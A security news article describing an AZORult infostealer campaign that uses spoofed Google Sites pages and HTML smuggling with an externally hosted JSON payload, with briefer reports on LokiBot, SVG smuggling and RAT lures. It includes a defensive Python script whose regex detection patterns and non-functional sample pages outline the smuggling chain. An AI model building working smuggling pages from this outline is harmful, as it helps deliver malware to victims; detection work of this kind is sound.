Cybersecurity researchers have discovered a new malware campaign that leverages fake Google Sites pages and HTML smuggling to deploy commercial malware called AZORult to facilitate information theft.
“It uses an unorthodox HTML smuggling technique in which the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.
The phishing campaign was not attributed to a specific actor or threat group. The cybersecurity firm described it as a widespread attack, carried out with the intent of collecting sensitive data for sale in clandestine forums.
AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It is typically distributed via phishing and malspam campaigns, Trojanized installers for pirated software or media, and malvertising.
Once installed, it is able to collect credentials, cookies and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.
The latest attack activity involves the threat actor creating spoofed Google Docs pages on Google Sites that then use smuggled HTML to deliver the payload.
HTML smuggling is the name given to a stealthy technique in which the legitimate functionality of HTML5 and JavaScript is abused to assemble and launch malware by “smuggling” an encoded malicious script.
Thus, when a visitor is tricked into opening the malicious page by a phishing email, the browser decodes the script and extracts the payload onto the host device, effectively bypassing typical security controls such as email gateways, which are known to inspect only suspicious attachments.
The AZORult campaign takes this approach to the next level by adding a CAPTCHA barrier, an approach that not only provides a semblance of legitimacy but also serves as an additional layer of protection against URL scanners.
The downloaded file is a shortcut file (.LNK) masquerading as a PDF bank statement; launching it triggers a series of actions that run intermediate batch and PowerShell scripts from an already compromised domain.
One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware.
“It stealthily runs the AZORult fileless infostealer using reflective code loading, bypassing disk-based detection and minimizing artifacts,” said Michael Alcantara. “It uses an AMSI bypass technique to avoid detection by a variety of host-based anti-malware products, including Windows Defender.”
“Unlike common smuggled files where the blob is already within the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing that the connection is legitimate.”
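As an added illustration of the two variants described above (the classic one with the encoded blob embedded in the HTML, and this campaign's variant that pulls the encoded payload from a separate JSON file on another host), here is a small Python triage script that flags the JavaScript API combinations HTML smuggling relies on. It is example code written for this article, not Netskope's tooling; the indicator patterns and the constructed sample pages are assumptions.

```python
import re

# Heuristic indicators of HTML smuggling in page source. These are assumed
# patterns for the decode -> Blob -> forced-download chain the article
# describes, not signatures taken from the Netskope report.
INDICATORS = {
    "decode": re.compile(r"\batob\s*\(|Uint8Array\.from\s*\(|charCodeAt\s*\(", re.I),
    "blob": re.compile(r"new\s+Blob\s*\(|URL\.createObjectURL\s*\(|msSaveOrOpenBlob", re.I),
    "trigger": re.compile(r"\.click\s*\(\s*\)|\.download\s*=", re.I),
    # Payload fetched as JSON from another host, as in the AZORult variant.
    "remote_json": re.compile(r"fetch\s*\(\s*['\"]https?://[^'\"]+\.json['\"]|\.json\s*\(\s*\)", re.I),
    # A large base64 literal embedded directly in the page (classic variant).
    "inline_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}


def inspect_html(html: str) -> dict:
    """Return the matched indicator names and a coarse verdict for one page."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(html)}
    if {"decode", "blob", "trigger"} <= hits:
        verdict = "external-json-smuggling" if "remote_json" in hits else "inline-smuggling"
    else:
        verdict = "clean"
    return {"hits": sorted(hits), "verdict": verdict}


# Constructed, deliberately non-functional samples (not real campaign pages).
CLEAN = "<html><script>document.title = 'Sign in';</script></html>"
INLINE = ("<html><script>var d='" + "QUJD" * 60 + "';\n"
          "/* ... decode d with atob(d), wrap it in new Blob([...]), */\n"
          "/* hand URL.createObjectURL(b) to an anchor, then a.click(); */\n"
          "</script></html>")
EXTERNAL = ("<html><script>fetch('https://example.invalid/p.json').then(r=>r.json())\n"
            "/* ... then atob(j.data), new Blob([...]), URL.createObjectURL(b), a.click(); */\n"
            "</script></html>")

if __name__ == "__main__":
    for label, page in [("clean", CLEAN), ("inline", INLINE), ("external", EXTERNAL)]:
        print(label, inspect_html(page))
```

The external variant scores even though the page carries no large literal, which is exactly the case a scanner that only looks for embedded base64 blobs would miss.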
The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to spread Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of creating smuggled HTML or SVG files.
AutoSmuggle “takes a file such as an exe or archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.
Phishing campaigns have also been observed using link files compressed within archive files to propagate LokiBot, an information stealer similar to AZORult with functionality to harvest data from web browsers and cryptocurrency wallets.
“The LNK file executes a PowerShell script to download and run the LokiBot loader executable from a URL. The LokiBot malware has been observed using image steganography, multi-layer packaging, and living-off-the-land (LotL) techniques in the campaign,” SonicWall said last week.
In another case highlighted by Docguard, malicious shortcut files were discovered to initiate a series of payload downloads and ultimately distribute AutoIt-based malware.
That’s not all. Users in the Latin America region are being targeted as part of an ongoing campaign in which attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents accusing recipients of violating traffic rules.
Inside the PDF file there is a link which, when clicked, downloads a ZIP archive containing a VBScript. Once executed, the VBScript drops a PowerShell script responsible for fetching one of several remote access trojans, such as AsyncRAT, njRAT, and Remcos.